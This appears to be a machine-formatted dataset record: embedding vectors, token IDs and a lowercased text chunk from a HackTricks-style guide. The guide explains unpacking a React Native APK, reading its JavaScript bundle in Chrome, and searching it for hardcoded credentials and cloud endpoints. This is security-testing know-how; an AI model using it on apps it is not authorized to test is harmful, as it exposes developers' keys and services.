-0.8128465414047241, -0.17168772220611572, 1.0371251106262207, 0.8059890866279602, -0.08912906050682068, 0.3392200469970703, -0.3198307752609253, -0.08788854628801346, -0.65764319896698, 0.8696795701980591, 0.6765785217285156, -0.5982516407966614, -0.25912150740623474, -0.16979879140853882, 0.271117240190506, 0.1290653496980667, -0.47725817561149597, 0.7387453317642212, 0.3542383015155792, 0.41415879130363464, -0.2741585969924927, -0.5601745247840881, 0.48974841833114624, 0.17954641580581665, 0.19805468618869781, 0.6188151240348816, 0.48121821880340576, 0.638579785823822, 0.5018622875213623, -0.24836485087871552, -0.2017507702112198, 0.6866653561592102, 0.5558920502662659, 0.12432795763015747, 0.16251079738140106, 0.36708125472068787, -0.5172771215438843, 0.7378836870193481, 0.09967132657766342, -0.15679241716861725, 0.5162234902381897, 0.16826218366622925, 0.09359025210142136, -0.15099385380744934, -0.9487069845199585, 0.5895416140556335, -0.9585751295089722, 0.7555720806121826, 0.312283992767334, 0.26400357484817505, -0.5917491316795349, -0.24751977622509003, 0.33948445320129395, 0.4049832820892334, -0.8343340158462524, -0.011697622016072273, 0.3866446614265442, -0.12477915734052658, 0.5189812183380127, -0.42374542355537415, 0.39582401514053345, -0.08867813646793365, 1.1000109910964966, -0.1833825707435608, -0.3838740289211273, -0.10004052519798279, -0.4092373251914978, -0.9333588480949402, -0.8511679172515869, -0.4534001052379608, -1.0484272241592407, 0.05463394150137901, 0.26547497510910034, -0.561518132686615, -0.09359736740589142, -1.1258734464645386, 0.6193518042564392, -0.16074950993061066, -0.6112022399902344, 0.3122510015964508, 0.5538766980171204, 0.3295222222805023, -0.08316078782081604, -0.20051348209381104, 0.22008371353149414, 0.4589110016822815, -0.2983490228652954, 0.14724810421466827, 0.07835052907466888, -0.41364434361457825, -0.06982596218585968, -0.45877107977867126, 0.10126915574073792, -0.6442286372184753, 0.16110765933990479, 0.12856541574001312, -0.46774575114250183, -0.06048274412751198, -0.3000864088535309, -0.4970303475856781, -0.3562507927417755, 0.8297728896141052, 0.8981795907020569, -0.3246192932128906, 0.812407910823822, 0.6974272131919861, -0.0006140159093774855, 0.466948926448822, 0.3190942704677582, 0.3214380145072937, -0.47388842701911926, 0.3179703652858734, 0.5581644177436829, 0.15304578840732574, -0.4040653109550476, -0.7189146280288696, 0.015089770779013634, 0.3811815083026886, -0.3362155854701996, -1.0850123167037964, 0.11982417106628418, 0.6558148264884949, -0.3279140293598175, -1.3141191005706787, 0.24221977591514587, -0.32804355025291443, -0.2551741600036621, -0.09107281267642975, 0.33432960510253906, 0.4086875915527344, 0.2391805499792099, 0.24426870048046112, -0.6141980886459351, 0.24717272818088531, -0.5104471445083618, -0.22114698588848114, -0.02743985503911972, -0.511959969997406, 0.0620746910572052, 0.5761622786521912, 0.5733864307403564, 0.021815598011016846, 0.09090002626180649, -0.501173198223114, -0.04065859317779541, -0.49954700469970703, -1.0160001516342163, -0.21697399020195007, 0.3037136495113373, 0.6570889353752136, 0.6519250273704529, 0.30737969279289246, -0.9046481251716614, 0.27178558707237244, 0.04277840629220009, 0.00964371394366026, 0.5812950730323792, 0.6190223097801208, 0.15871867537498474, -0.016547705978155136, 0.14523684978485107, -1.3120827674865723, -0.15639258921146393, 0.5915311574935913, 0.13150730729103088, 0.06514215469360352, 0.14414459466934204, 0.20441801846027374, -0.3519878089427948, 0.8261483907699585, -0.1485913246870041, -0.4780493378639221, 1.4175735712051392, -0.38515999913215637, 1.0312609672546387, -0.6424908638000488, -0.4595230519771576, 0.5565583109855652, 0.3442109525203705, 0.8179485201835632, 1.2125916481018066, -0.13182327151298523, -0.4460160434246063, -0.45579418540000916, -0.6024670600891113, 0.4280413091182709, -0.3218585252761841, 0.19156277179718018, 0.6278004050254822, -0.050915006548166275, -0.4322354197502136, -0.10567517578601837, 0.4569947123527527, 0.12992924451828003, 0.4610663950443268, -0.14762642979621887, 0.2745230793952942, 0.027583763003349304, -0.06365419179201126, 0.4794200360774994, -0.618329644203186, -0.28173917531967163, 0.26315605640411377, 0.7197333574295044, 0.4337867796421051, 0.11339735984802246, 0.13358484208583832, -0.0173657163977623, -0.2529471218585968, -0.7104839086532593, -0.1711927354335785, 0.1459791213274002, -0.3489231765270233, 0.4363110363483429, 0.5792465806007385, 0.30471348762512207, -0.2641785144805908, -0.06196944788098335, -0.6866274476051331, -0.2985035181045532, 0.6387779116630554, -0.26243460178375244, -0.19059640169143677, -1.016561508178711, -0.18432685732841492, -0.020335212349891663, 0.22528211772441864, -0.31905847787857056, -1.0323567390441895, -0.7762634754180908, -0.892907440662384, 0.07595297694206238, 0.9558642506599426, -0.10106140375137329, 0.032441556453704834, -1.1938289403915405, 0.46401140093803406, 0.20205609500408173, -0.6758763790130615, -0.37765347957611084, 0.11806905269622803, 0.15475741028785706, -0.17767897248268127, 0.1929328590631485, 0.22580885887145996, 0.40547066926956177, -0.01906055398285389, -0.5322542786598206, 0.36287376284599304, -0.6000617146492004, -0.2087681144475937, 0.41274094581604004, 0.29866817593574524, -0.1791331171989441, 0.5218058824539185, -0.01894298754632473, -0.14889055490493774, -0.022972235456109047, 0.33233651518821716, -0.7126492857933044, -0.7846339344978333, 0.4201563596725464, 0.3009786605834961, -0.2899249196052551, 0.6851528286933899, 0.2179763913154602, 0.37264877557754517, 0.13190379738807678, -0.09172487258911133, -0.17779715359210968, 0.006079657934606075, -0.21022790670394897, 1.0000749826431274, 0.1463712900876999, -0.42392244935035706, 0.2833847403526306, -1.0999352931976318, 1.067631721496582, 0.050809357315301895, -0.5794601440429688, 0.150958850979805, -1.2151094675064087, -0.5740670561790466, -0.1363569051027298, -0.46978089213371277, 0.2771517336368561, 0.3402150273323059, -0.7926580905914307, 0.619535505771637, 0.49231040477752686, -0.1452384889125824, 0.0806151032447815, -0.44685760140419006, -0.8906280994415283, 0.3782721757888794, 0.8192272186279297, 0.99627685546875, -0.0034840726293623447, -0.8295382857322693, 0.7043807506561279, 0.47539830207824707, 0.5079441070556641, -0.39478766918182373, 0.042151402682065964, 0.2154673933982849, -0.3107878863811493, 0.08205364644527435, 0.8591954708099365, -0.7828211784362793, -0.24977834522724152, 0.5876699686050415, 0.05721557140350342, 0.36744874715805054, 0.1472070813179016, -0.7514029145240784, 1.2804993391036987, 0.22304107248783112, -1.0516637563705444, 0.12758931517601013, 0.33600229024887085, 0.6643409729003906, 0.22018827497959137, 0.311636745929718, -0.7896586656570435, -1.1646875143051147, 0.07478468120098114, 0.8436787128448486, -0.8705942630767822, -0.8490154147148132, -0.6845836639404297, -0.6698517799377441, -0.9003397822380066, 0.4171208441257477, -0.4530387818813324, -0.9248793125152588, 0.25158652663230896, -1.0219680070877075, 0.47238799929618835, -0.09265327453613281, 0.7081815004348755, -0.2007933408021927, -0.4332936704158783, 0.6522584557533264, 1.1546862125396729, -0.05181191861629486, -0.025114450603723526, 0.07469259202480316, -0.2509307265281677, 0.27058345079421997, 0.6514326930046082, -0.6214423179626465, -0.07775449007749557, 0.4308108687400818, 0.043360255658626556, -0.49984559416770935, -0.12611228227615356, -0.8714969158172607, 0.3211797773838043, -0.05780947208404541, -0.08552426099777222, -0.38378483057022095, -0.13635528087615967, 0.2394775003194809, -0.10410785675048828, 0.40108340978622437, -0.462270051240921, -0.15013587474822998, -0.1665094643831253, 0.5035141110420227, 0.0840306282043457, 0.24895542860031128, 0.11014808714389801, -0.2801319658756256, -0.3212888240814209, -1.0957763195037842, 0.6966018676757812, 0.21436956524848938, -0.046358395367860794, -0.023606710135936737, -0.469158411026001, 0.8476293087005615, -1.2249349355697632, -0.37526488304138184, 0.6957730650901794, 0.6562015414237976, 0.3568572700023651, 0.1552497297525406, -0.00418187165632844, -0.09202650934457779, -0.982865035533905, -0.09984038770198822, 0.7731304168701172, -0.43285495042800903, -0.13588997721672058, 0.011694377288222313, -0.18401651084423065, -0.31752780079841614, 0.2902878224849701, 0.743789553642273, -0.7255918979644775, 0.8285974860191345, -0.000494368199724704, -1.7215220928192139, -0.5954578518867493, -0.08440319448709488, -0.08617967367172241, 0.6066393256187439, 0.8362159132957458, 0.14844384789466858, 0.6841087937355042, 0.9728531837463379, -0.5881433486938477, -0.012773452326655388, 0.12749677896499634, 0.7490033507347107, -0.34514090418815613, -0.048586077988147736, 0.027971109375357628, 0.08298493921756744, -0.4451737403869629, -0.9601775407791138, -0.34060198068618774, -0.1381317526102066, -0.026699073612689972, -0.47291335463523865, -0.0938338041305542, 0.2215946614742279, -0.673930287361145, 0.5109614133834839, 0.38850757479667664, -0.0011641825549304485, -0.14639265835285187, -0.3168334364891052, 0.8610458970069885, -0.11883671581745148, 0.1340324729681015, 0.34013837575912476, 0.5452152490615845, 0.07300295680761337, -1.2181110382080078, -0.3406051695346832, -0.49442118406295776, -0.02062559314072132, 0.6738305687904358, 0.3539193868637085, 0.5918500423431396, 0.40199196338653564, 0.3416013717651367, 1.5197962522506714, -0.1523975133895874, 0.36501458287239075, 0.430081844329834, -0.12953807413578033, -1.166125774383545, 0.20443235337734222, -0.0040785763412714005, -0.5887638926506042, 0.24946200847625732, -0.1067708283662796, -0.668717086315155, -0.22180840373039246, 1.1246649026870728, -0.051688842475414276, -0.3582412600517273, 0.37379300594329834, -0.3378501832485199, 0.08962669223546982, 0.11485868692398071, -0.49564796686172485, -0.9858229160308838, 0.20180517435073853, -0.242597758769989, -0.5859622359275818, -0.8492858409881592, 0.5447887182235718, 0.06572094559669495, 0.6727267503738403, -0.6803855299949646, -0.3548574447631836, -0.2616601884365082, -0.6156595349311829, -0.23165448009967804, 0.1695837825536728, -0.4368285536766052, -0.5961669683456421, -0.010014344938099384, -0.28079575300216675, -0.41663432121276855, 0.017714805901050568, -0.5699431300163269, 0.4569125473499298, -0.685941755771637, -0.2225329428911209, 0.13557036221027374, -0.03783233463764191, -0.017149854451417923, 0.7376179695129395, 0.413151353597641, 0.16789795458316803, -0.4925782382488251, -0.6220744848251343, -0.16329701244831085, 0.029490623623132706, 0.2913288176059723, -0.23640967905521393, 0.07673114538192749, 0.2510971426963806, -0.02374287322163582, 0.27413639426231384, -0.3071121275424957, 0.09769843518733978, -1.1196274757385254, -0.7598985433578491, 0.486052930355072, -0.10190056264400482, 0.0010305544128641486, 0.5588833689689636, -0.7265715599060059, 0.18944190442562103, 0.06561204791069031, 0.0032644267193973064, 0.22980299592018127, 0.5790584087371826, 0.38041234016418457, -0.21639074385166168, 0.024526208639144897, 0.5656638741493225, 0.5082011222839355, 0.04407835751771927, 0.3555348813533783, 0.3962378203868866, -0.008945059962570667, -0.23450960218906403, -0.22982504963874817, -0.06815199553966522, -0.5412712693214417, -0.1370818316936493, 0.3391379714012146, -0.1512763500213623, -0.3336747884750366, 0.67373126745224, -0.1328268200159073, -0.10442328453063965, -0.724138081073761, -0.8182086944580078, 0.36151209473609924, -0.2815552353858948, 0.7520771026611328, -0.5258464813232422, 0.3355376422405243, -0.11490672826766968, -0.2323751300573349, -0.13639456033706665, -0.02351742796599865, 0.3060457706451416, 0.19053864479064941, 0.7156181931495667, -0.5559775829315186, -0.03512496501207352, 0.06090087071061134, -0.1274642050266266, -0.26332926750183105, -0.5047635436058044, 0.0142663000151515, 1.4203667640686035, -0.1702992469072342, -0.4807416498661041, -0.6467409729957581, -0.3542511761188507, 0.6213858127593994, 0.8768413662910461, 0.0014733726857230067, 0.07528357207775116, -0.7463112473487854, 0.7022106647491455, -0.7492000460624695, 0.17852403223514557, 0.6881998181343079, 0.8302345871925354, -0.09197331964969635, 0.016910547390580177, -0.3254339396953583, 0.3476549983024597, 0.34421655535697937, 0.39953362941741943, 0.28919896483421326, -0.033928047865629196, 0.7937187552452087, 0.4662351608276367, -0.10728966444730759, -0.03266686573624611, 0.4970719516277313, 0.36449432373046875, 0.3742850720882416, -0.32570043206214905, 0.994662880897522, 0.09721256792545319, 0.15298424661159515, -0.20265527069568634, 0.20058433711528778, -0.07360563427209854, -0.09274931252002716, 0.5675926208496094, -0.11152733117341995, -1.1393150091171265, 0.029894359409809113, -0.8569437861442566, 0.19070790708065033, -0.3429889976978302, -0.2985404431819916, -0.05256844684481621, -0.2803439795970917, 0.31053975224494934, -0.46349820494651794, -0.2715754210948944, -0.0694439709186554, -0.24374140799045563, 0.8152297139167786, 0.44613125920295715, -1.2392505407333374, -0.13736653327941895, 0.9718313217163086, 0.691769003868103, 0.03548576310276985, 0.5380064845085144, 0.2554655373096466, -0.20415151119232178, -0.6872961521148682, 0.2947145104408264, -0.7379485368728638, 0.09870424121618271, 0.6414856314659119, -0.5078108906745911, -0.9339114427566528, 0.6128530502319336, -0.563022255897522, -0.001311665284447372, 0.10024157911539078, -0.11715380847454071, -0.1573011577129364, 0.027448246255517006, -0.10381188243627548, -0.3939748704433441, -0.24922457337379456, 0.1675744503736496, 0.07928159832954407, -0.5525320768356323, 0.6398756504058838, -0.44640323519706726, -0.0817565843462944, -0.22622551023960114, 0.5477803349494934, -0.11663670092821121, 1.195369005203247, 0.7169308662414551, -0.5114791989326477, 0.0757950097322464, 0.07933222502470016, 0.024444878101348877, -0.14571499824523926, -0.05205324664711952, -0.059518445283174515, -0.2729630172252655, -0.3291899859905243, -0.8626465797424316, -0.16964119672775269, 0.5291846394538879, -0.33535075187683105, -0.9501128196716309, 0.8749169111251831, -0.18781104683876038, -0.5571773648262024, 0.3314320743083954, 0.8618600368499756, 0.26428765058517456, -0.16498441994190216, -0.445485919713974, 0.429484099149704, -0.5465376377105713, -0.3418044447898865, -0.8330225944519043, 0.00065598264336586, -0.5201625823974609, -0.5924391746520996, -0.2626686692237854, -0.7665649652481079, -0.5551798939704895, -0.7412434816360474, 0.15959961712360382, -0.570480227470398, 0.7069788575172424, 0.47429266571998596, 0.6527342200279236, 0.2949520945549011, -0.36299100518226624, 0.003952196799218655, 0.8093650341033936, 1.000311255455017, -0.20083904266357422, 0.5606098175048828, 0.47716596722602844, 0.2386990785598755, -0.026949049904942513, 0.9191926717758179, 0.7984550595283508, 0.2529805302619934, 0.44260895252227783, 0.2506209909915924, -0.20368555188179016, -0.624195396900177, -0.6644361615180969, -0.24485670030117035, 0.9521389603614807, 0.06154535338282585, -0.7489210963249207, -0.5043391585350037, -0.24084267020225525, -0.9316791892051697, 0.310260146856308, -0.6730653643608093, 0.027795540168881416, -1.0156209468841553, 0.055932290852069855, 0.5280977487564087, -1.4299392700195312, 4.119652271270752, 0.6881853938102722, 0.6321104168891907, 0.3824518322944641, -0.043672800064086914, 0.29842880368232727, 0.086222805082798, -1.5815445184707642, -0.2870858907699585, 0.16809996962547302, 0.6966763138771057, -0.8508696556091309, 0.1470378339290619, 0.5562908053398132, -0.420619398355484, 0.513344407081604, -0.20115484297275543, 0.13969635963439941, 0.11703048646450043, -0.42430055141448975, -0.6142056584358215, 0.9745641350746155, 0.38064417243003845, 0.8963600993156433, 0.39494258165359497, -0.10064546018838882, 0.28555065393447876, -0.44244757294654846, -0.17920488119125366, -0.06588567793369293, 0.37819331884384155, -0.010093084536492825, 0.8720101118087769, -0.41488170623779297, 0.19409145414829254, -0.061995044350624084, 0.7237441539764404, -0.5446622371673584, 0.057059213519096375, 0.2535856068134308, 0.5062069892883301, -0.36198189854621887, -0.01715068891644478, -0.9246641993522644, -0.2512071430683136, 0.6408059597015381, -0.7051535248756409, 0.6076859831809998, 0.26870229840278625, -0.9336850047111511, -0.42661193013191223, -0.03996716067194939, 0.3615927994251251, -1.014221429824829, -0.5462813377380371, 0.032767195254564285, -0.22579450905323029, -0.005054051987826824, 0.23329585790634155, -0.012224942445755005, 0.04829680174589157, 0.48217594623565674, -0.49286550283432007, -0.19111768901348114, -0.9217599630355835, 0.2599441111087799, -0.6318046450614929, 1.5459980964660645, -0.24248048663139343, -0.6434431076049805, 0.11028997600078583, -0.8013753294944763, -0.7792891263961792, 0.023072578012943268, 0.05223122239112854, 0.7500709295272827, 0.28426817059516907, 0.7078863382339478, 0.23451580107212067, -0.4780169129371643, 0.7947187423706055, -0.0635366439819336, -0.6240485310554504, -0.454334020614624, 0.6168295741081238, 0.7785243391990662, -0.30605173110961914, 0.5410768389701843, 0.07663985341787338, 0.16544736921787262, 0.8231883645057678, 0.7269328236579895, -0.2007708102464676, -0.9126313924789429, 0.6219272613525391 ]
[ 1012, 1017, 1012, 5646, 2129, 2017, 2215, 2000, 4339, 1037, 5576, 2000, 2139, 1011, 27885, 25608, 16280, 1996, 5164, 1012, 1018, 1012, 2079, 2009, 1024, 1007, 5576, 10760, 2139, 16429, 25608, 12921, 5164, 2003, 1024, 1026, 5896, 5034, 2278, 1027, 1000, 16770, 1024, 1013, 1013, 9226, 4048, 3726, 1012, 4012, 1013, 5622, 2497, 1013, 9226, 4048, 3726, 1012, 8117, 1012, 1046, 2015, 1000, 1028, 1026, 1013, 5896, 1028, 1026, 5896, 1028, 13075, 18594, 1027, 2047, 9226, 4048, 3726, 1012, 10812, 1006, 1005, 1050, 2546, 18827, 2480, 8545, 7382, 2226, 2692, 2213, 2487, 2595, 2575, 24798, 3597, 2615, 18139, 13596, 28008, 2121, 14376, 2063, 1005, 1010, 1063, 16457, 1024, 1016, 1065, 1007, 1025, 18594, 1012, 2707, 1006, 1007, 1025, 1026, 1013, 5896, 1028, 1996, 18750, 5896, 1045, 2626, 2000, 2139, 1011, 27885, 25608, 16280, 2009, 2003, 1024, 4372, 2278, 1035, 2358, 2099, 1027, 1000, 100, 1000, 3091, 1027, 18798, 1006, 4372, 2278, 1035, 2358, 2099, 1007, 4175, 1027, 1014, 3207, 2278, 1035, 2358, 2099, 1027, 1031, 1014, 1033, 1008, 1006, 3091, 1013, 1016, 1007, 2096, 1006, 4175, 1026, 3091, 1007, 1024, 11703, 1035, 2358, 2099, 1031, 4175, 1013, 1016, 1033, 1027, 1006, 20014, 1006, 4372, 2278, 1035, 2358, 2099, 1031, 4175, 1033, 1010, 2385, 1007, 1026, 1026, 1018, 1007, 1009, 20014, 1006, 4372, 2278, 1035, 2358, 2099, 1031, 4175, 1009, 1015, 1033, 1010, 2385, 1007, 1004, 1014, 2595, 4246, 4175, 1009, 1027, 1016, 16550, 11703, 1035, 2358, 25074, 2100, 1027, 1031, 4293, 1010, 6163, 1010, 6282, 1010, 6445, 1010, 4749, 1010, 5401, 1010, 6391, 1010, 3938, 1033, 4372, 2278, 1035, 2358, 2099, 1027, 11703, 1035, 2358, 29566, 16671, 1027, 1014, 7770, 13512, 2232, 1027, 18798, 1006, 4372, 2278, 1035, 2358, 2099, 1007, 2096, 1006, 4175, 1026, 3091, 1007, 1024, 11703, 1035, 2358, 2099, 1031, 4175, 1033, 1027, 10381, 2099, 1006, 4372, 2278, 1035, 2358, 2099, 1031, 4175, 1033, 1034, 3145, 1031, 4175, 1003, 18798, 1006, 3145, 1007, 1033, 1007, 4175, 1009, 1027, 1015, 16550, 1005, 1005, 1012, 3693, 1006, 11703, 1035, 2358, 2099, 1007, 2062, 4973, 2072, 2031, 2589, 1037, 2261, 7566, 2006, 2139, 1011, 27885, 25608, 18252, 11924, 18726, 2008, 2421, 1037, 3528, 1997, 27885, 25608, 10719, 10595, 1012, 1999, 2122, 7566, 1010, 1045, 6848, 1996, 3935, 27885, 25608, 10719, 5461, 1010, 2026, 5576, 2000, 2139, 1011, 27885, 25608, 16280, 2068, 1010, 1998, 1996, 16852, 1998, 9804, 1045, 2081, 2043, 10561, 2129, 1045, 2359, 2000, 2139, 16429, 25608, 16280, 1012, 2304, 12707, 3915, 2760, 1024, 1523, 4895, 23947, 2075, 1996, 8966, 4895, 23947, 2121, 1024, 7901, 3330, 2019, 11924, 3424, 1011, 4106, 3075, 1524, 1031, 2678, 1033, 2023, 2831, 3632, 2058, 7901, 3330, 2028, 1997, 1996, 2087, 3375, 3424, 1011, 4106, 3128, 8860, 1045, 1521, 2310, 2464, 2109, 2011, 2019, 11924, 4646, 1012, 2009, 4472, 3262, 27885, 25608, 10719, 5461, 1999, 3128, 3642, 1012, 28667, 2239, 10476, 1024, 1523, 1996, 4130, 2000, 1996, 18093, 1024, 11924, 3179, 1524, 1031, 2678, 1033, 2023, 2831, 15841, 1037, 2186, 1997, 27885, 25608, 10719, 5461, 1010, 9578, 1999, 9262, 3642, 1010, 2008, 2019, 11924, 28516, 7159, 2001, 2478, 2000, 5342, 2049, 5248, 1012, 102 ]
hack_tricks
421.txt
2
[CLS] react native applicationinformation copied from url native is a mobile application framework that is most commonly used to develop applications for android and ios by enabling the use of react and native platform capabilities. these days, it ’ s become increasingly popular to use react across platforms. but most of the time, the core logic of the application lies in the react native javascript that can be obtained without needing to use dex2jar. step - 1 : let ’ s confirm whether the application was built on react native framework. to check this, rename the apk with zip extension and then extract the apk to a new folder using the following commandcp com. example. apk example - apk. zipunzip - qq example - apk. zip - d reactnativebrowse to the newly created reactnative folder, and find the assets folder. inside this folder, it should contain index. android. bundle. this file will contain all of the react javascript in a * * minified format. * * react native reverse engineeringfind. - print | grep - i ". bundle $ " image for poststep - 2 : creating a file named index. html in the same directory with the following code in it. you can upload the file to url or proceed with the following steps : < script src = ". / index. android. bundle " > < / script > image for postopen the index. html file in google chrome. open up the developer toolbar ( command + option + j for os x or control + shift + j for windows ), and click on “ sources ”. you should see a javascript file, split up into folders and files that make up the main bundle. if you are able to find a file called index. android. bundle. map, you will be able to analyze the source code in an unminified format. map files contain the source mapping that allows you to map minified identifiers. step - 3 : search for sensitive credentials and endpointsin this phase, you have to identify the sensitive keywords to analyze the javascript code. a pattern that is popular with react native applications, is the use of a third party services like such as firebase, aws s3 service endpoints, private keys etc., during my initial recon process, i have observed the application using the dialogflow service. so based on this, i have searched a pattern related to its configuration. fortunately, i
[ -0.10608240962028503, -0.2442004680633545, -0.6859776377677917, 0.031209560111165047, -0.2844092547893524, 0.13434657454490662, 0.05706728994846344, 0.10726282745599747, 0.8428086042404175, 0.8766967058181763, 0.1123313158750534, -0.07941463589668274, 0.2564134895801544, -0.7406082153320312, -0.726127564907074, -0.3538976311683655, -0.7257651686668396, 0.27602165937423706, -0.7567929029464722, 0.16856291890144348, 0.01537393406033516, 0.42009028792381287, -0.874037504196167, -0.838560938835144, -0.7584698796272278, 0.3132624626159668, 1.021418571472168, -0.001586786238476634, 0.46288713812828064, 0.45471301674842834, -0.20618946850299835, 0.5433064103126526, -0.2047261893749237, -0.7145051956176758, 0.5168405771255493, -0.5288626551628113, 0.9993168115615845, -0.5289548635482788, 0.10380124300718307, -0.8793463706970215, 0.7459284067153931, -0.24194951355457306, 0.051734935492277145, -0.8736506104469299, -0.6624414920806885, -0.2677515149116516, 0.18206022679805756, -0.45372551679611206, 0.21728332340717316, -0.41295215487480164, 0.2955847382545471, 0.6153535842895508, -0.14928597211837769, 0.09578061103820801, 0.08006875962018967, 0.02553737163543701, 0.07788437604904175, -0.17718178033828735, -0.7457628846168518, 0.32319632172584534, -0.1344020813703537, 0.5159552693367004, 0.3179587721824646, -0.5679243803024292, 0.06855908036231995, 0.6519075632095337, 0.1773465871810913, 0.10332273691892624, -0.09378756582736969, -0.36378014087677, -0.7248964309692383, 0.7817347645759583, -0.8789608478546143, -0.7584285140037537, -0.9683348536491394, 0.4663391709327698, 0.4912799000740051, -0.4542108476161957, 0.11656997352838516, 0.7271319627761841, -0.011871714144945145, 1.1034337282180786, 0.20523680746555328, -0.18277685344219208, -0.5142567753791809, -0.234280526638031, 0.8238442540168762, 0.40368932485580444, -0.5389727354049683, -0.11740656197071075, 0.10611433535814285, 0.3921814262866974, -1.0161693096160889, -0.23667016625404358, 0.8954333662986755, 1.1280860900878906, -0.07398030161857605, -0.19411399960517883, -0.24604938924312592, 0.0008314420119859278, 0.9827643036842346, 0.8809899687767029, 0.13060256838798523, 0.12728369235992432, -0.44471275806427, 0.15465106070041656, -0.01492213923484087, -0.4243514835834503, -0.38257595896720886, -0.5638718008995056, 0.3931688666343689, 0.18697945773601532, 0.582114577293396, -0.8626731634140015, -0.35911884903907776, 0.441368967294693, 0.5848151445388794, -0.32725614309310913, -0.5357603430747986, 0.2301151305437088, 0.02589162066578865, -0.3939044773578644, 0.3304191827774048, -0.4175959527492523, 0.29510974884033203, 0.5155184268951416, 0.3724777400493622, 0.822829008102417, -0.2986198663711548, -0.40380731225013733, -0.5960661768913269, -0.16083742678165436, 0.3080093264579773, 1.2795268297195435, -0.3368055820465088, -0.14763261377811432, 0.6235941052436829, -0.285817414522171, 0.7047240734100342, -0.7256016135215759, -0.06770613044500351, 0.5360538959503174, 0.14484955370426178, 1.2159829139709473, 0.18325547873973846, -0.2962805926799774, -0.39331015944480896, -0.30250295996665955, -0.12501974403858185, -0.004039251711219549, -0.34971755743026733, 0.25550082325935364, 0.7213243246078491, -0.4271354377269745, -0.79510897397995, 0.1926347017288208, -0.33320870995521545, 0.674088716506958, 0.615058958530426, -0.43028882145881653, -0.005119744688272476, 0.5075636506080627, -0.23703818023204803, 0.2528981864452362, -0.2075873166322708, 0.52553790807724, -0.46659812331199646, -0.74744713306427, 0.17112591862678528, 0.206200510263443, -0.5120210647583008, 0.14508093893527985, 0.5623502731323242, -0.18557195365428925, 1.7906527519226074, 0.43022751808166504, 0.005668062716722488, 0.1480940729379654, -0.16278909146785736, 0.4573858976364136, 0.48390287160873413, 0.831957221031189, 0.09217759221792221, 0.9497259855270386, -0.20914226770401, 0.12134059518575668, -0.24367298185825348, -0.5917057394981384, -0.17952382564544678, -0.5232623219490051, 0.08698226511478424, 0.9842886924743652, -0.6983391642570496, 0.27946916222572327, 0.28794530034065247, 0.036160752177238464, -1.2154390811920166, 0.3893393874168396, 0.016245879232883453, -1.5486689805984497, -0.8439650535583496, 0.6379754543304443, -0.38480421900749207, 0.4523276686668396, -0.44860580563545227, 0.05056508257985115, 0.676300585269928, 0.8000809550285339, 0.19838254153728485, 0.8270671963691711, 0.9217087030410767, -0.2910645604133606, -0.8229385018348694, -0.17901760339736938, 0.25405430793762207, -0.314591646194458, -0.16272301971912384, -0.29011183977127075, -0.038110364228487015, 0.06538757681846619, 0.17805911600589752, 0.15520817041397095, 0.27602091431617737, 0.4066437780857086, -0.22800470888614655, 0.06011652573943138, 0.4100573658943176, -0.11248664557933807, -0.06937321275472641, -0.1550993025302887, 0.09522977471351624, 0.7716768980026245, 0.9523569345474243, 1.003860354423523, -0.26950469613075256, -0.1478053331375122, -0.005047553218901157, 0.454577773809433, 0.5457870960235596, -0.2139676809310913, -0.18594063818454742, 0.6996453404426575, 0.3078199625015259, 0.38739702105522156, 0.3553595244884491, 0.42448702454566956, 0.20959442853927612, -0.18408863246440887, -0.34802407026290894, 1.456252932548523, -0.35128358006477356, 0.5143977403640747, 0.7993509769439697, -0.11860104650259018, -0.5455801486968994, -0.5265270471572876, 0.8949716091156006, 0.8051899671554565, -0.6553224921226501, -0.2715035080909729, 0.4174329340457916, -0.4401937425136566, 0.17178122699260712, -0.3529827296733856, -0.06602783501148224, 0.6063324809074402, -0.09050456434488297, 0.29490628838539124, -0.10613313317298889, -0.8378913998603821, -0.8277080059051514, -0.4725204110145569, -1.290391206741333, -0.206358402967453, -1.482763648033142, -0.15280303359031677, 0.22336086630821228, -0.8318590521812439, 0.527178168296814, 0.21057912707328796, -0.39796751737594604, -0.30326762795448303, 0.5563297867774963, 0.33264562487602234, 0.3870975971221924, 0.3995531499385834, 0.14173254370689392, -0.2909216582775116, -0.053901057690382004, 0.9837693572044373, -0.7107557058334351, -0.03157126531004906, -0.6138859391212463, -0.39898672699928284, 0.14798985421657562, -0.15856871008872986, 0.8222817182540894, -0.4307139813899994, 0.016742702573537827, 0.13768595457077026, 0.22466494143009186, 0.1261443942785263, -0.021932385861873627, 0.5016336441040039, -0.1790720522403717, 0.1684463620185852, 0.03422566503286362, 0.26421624422073364, 0.45940467715263367, 0.4481486678123474, -0.22007045149803162, 0.1976957768201828, -0.5935742259025574, 0.7220141887664795, -0.6919323205947876, 0.15387728810310364, 0.6555396318435669, -0.22651493549346924, -0.40290218591690063, -0.31170177459716797, -0.10256432741880417, -0.9671481847763062, -0.6956708431243896, -0.3426632881164551, 0.0849354937672615, 0.30145320296287537, -0.43273642659187317, -1.3924545049667358, 0.08135145902633667, -0.71426922082901, -0.4923474192619324, -0.325145959854126, 0.14875391125679016, 1.109472632408142, -0.6599639058113098, 0.21298034489154816, -0.5796328186988831, 0.41875290870666504, 0.5049321055412292, 0.19191938638687134, 0.2657385468482971, -0.7062623500823975, 0.31458333134651184, 0.22339855134487152, -0.03273024410009384, 0.44512712955474854, 0.13312923908233643, -0.5982822179794312, -0.10189300775527954, -0.898749589920044, -1.052337884902954, 0.029407376423478127, 0.12425746023654938, 0.2249714881181717, 0.23773811757564545, 0.6678438782691956, -0.5987825393676758, -0.379063218832016, 0.07913098484277725, 0.27948424220085144, 0.16927725076675415, 0.5034383535385132, 0.605322539806366, -0.38244763016700745, -0.6117846965789795, -0.4355919659137726, -0.4776940643787384, 0.0509827584028244, 0.5861318111419678, -0.49438920617103577, 0.41114935278892517, -0.057350605726242065, 0.07921047508716583, 0.7077717781066895, -0.3916478157043457, -0.7713140845298767, 1.0857017040252686, 0.24033965170383453, 0.9829765558242798, -0.11756815016269684, 0.3589380979537964, -0.19748325645923615, -0.28582093119621277, 0.9150091409683228, 0.8246631026268005, -0.43832460045814514, -0.10471632331609726, -0.5182890892028809, -0.2599262297153473, -0.1805977076292038, -0.11275485157966614, 0.13603191077709198, 0.4039614200592041, -0.1362445056438446, -0.7118557095527649, -0.5999276638031006, 0.7193639874458313, 0.8221266269683838, 0.607643187046051, 0.5274216532707214, 1.0676926374435425, 0.07917831838130951, -0.3671903610229492, 0.18771730363368988, -1.1166377067565918, -0.050474267452955246, -0.1625318080186844, 0.8959060907363892, 0.07234831154346466, 0.28055649995803833, 0.02740284614264965, -0.028867041692137718, -0.4710959792137146, -0.30152466893196106, 0.2132161259651184, 